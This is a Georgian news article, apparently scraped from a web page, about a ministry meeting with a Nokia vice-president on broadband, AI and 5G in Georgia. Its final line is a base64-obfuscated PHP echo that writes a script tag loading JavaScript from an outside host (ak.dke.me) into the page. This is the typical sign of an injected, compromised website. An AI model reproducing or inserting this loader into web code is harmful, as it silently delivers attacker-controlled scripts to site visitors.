celsiusi
ავერსი საქკაბელი
საქართველოში კორპორაცია „ნოკიას" საქმიანობის გაფართოების შესაძლებლობები განიხილეს ეკონომიკისა და მდგრადი განვითარების სამინისტროში, სადაც მინისტრის მოადგილეები გენადი არველაძე და ირაკლი ნადარეიშვილი ფინური კორპორაციის რეგიონული ვიცე-პრეზიდენტს მიკო ლავანტის შეხვდნენ. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME -ს ეკონომიკის სამინისტროდან აცნობეს. 
 
შეხვედრაზე აღინიშნა, რომ ფინურ კორპორაციას სურვილი აქვს, შემოვიდეს საქართველოს ბაზარზე. რაც შეეხება მიმართულებებს, შეხვედრაზე განხილული იქნა ისეთი საკითხები, როგორიცაა ფართოზოლოვანი ინფრასტრუქტურის, ხელოვნური ინტელექტისა და ზოგადად ციფრული ეკონომიკის განვითარება.
 
სამინისტროს წარმომადგენლებმა „ნოკიას" ვიცე-პრეზიდენტს გააცნეს საქართველოში საინფორმაციო ტექნოლოგიების განვითარების მიმართულებით არსებული ვითარება, მათ შორის, ქვეყანაში ციფრული ეკონომიკის განვითარებისა და საყოველთაო ინტერნეტიზაციის კუთხით მიღებული გადაწყვეტილებები. აღინიშნა, რომ საქართველოს აქვს ამბიცია, გახდეს ციფრული ჰაბი რეგიონში, რისთვისაც ახორციელებს მთელ რიგ პროგრამებს. გარდა ამისა, ყურადღება გამახვილდა ხელსაყრელ საკანონმდებლო და ბიზნეს გარემოზე, რომელიც მიმართულია ქვეყანაში საერთაშორისო ტექნოლოგიური კორპორაციების შემოსვლისა და რეგიონული წარმომადგენლობების გახსნის კუთხით, რამაც ქვეყნის ეკონომიკის განვითარებასა და ახალი სამუშაო ადგილების შექმნას უნდა შეუწყოს ხელი.
 
„ძალიან მოხარული ვარ, რომ მოვისმინე მთავრობის პროგრამის შესახებ, რომელიც მიზნად ისახავს უფრო ფართო ტერიტორიების დაფარვას ფართოზოლოვანი ინფრასტრუქტურით და ეხმარება საქართველოს მოსახლეობას ციფრული სერვისების ჩართვაში. ჩვენ ასევე ვისაუბრეთ სხვადასხვა აქტივობებზე 5G-სა და ბიზნესის გამჭვირვალობის შესახებ. „ნოკია" ამაყობს, რომ მსოფლიოში ყველაზე ეთიკური კომპანიაა ამ ინდუსტრიაში. ჩვენ ასევე ვისაუბრეთ, თუ რა სახის თანამშრომლობა შეგვიძლია საქართველოს მთავრობისა და ქართველი ხალხისთვის მომსახურების გაწევის თვალსაზრისით. მოხარული ვიყავი, რომ მოვისმინე საგადასახადო შეღავათების პროგრამის შესახებ და გავეცანი სხვადასხვა ტიპის განვითარების გეგმებს, რომლებიც მიზნად ისახავს, უფრო ნათელი გახადოს ციფრული სერვისების როლი მომავალის მსოფლიოში," - განაცხადა მიკო ლავანტიმ შეხვედრის დასრულების შემდეგ.
 
შეხვედრას ასევე დაესწრნენ სსიპ სააგენტოს „აწარმოე საქართველოში" დირექტორი მიხეილ ხიდურელი და ეკონომიკისა და მდგრადი განვითარების სამინისტროს კავშირგამბულობის, საინფორმაციო და თანამედროვე ტექნოლოგიების დეპარტამენტის უფროსი ეკა ყუბუსიძე.  
 
1310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");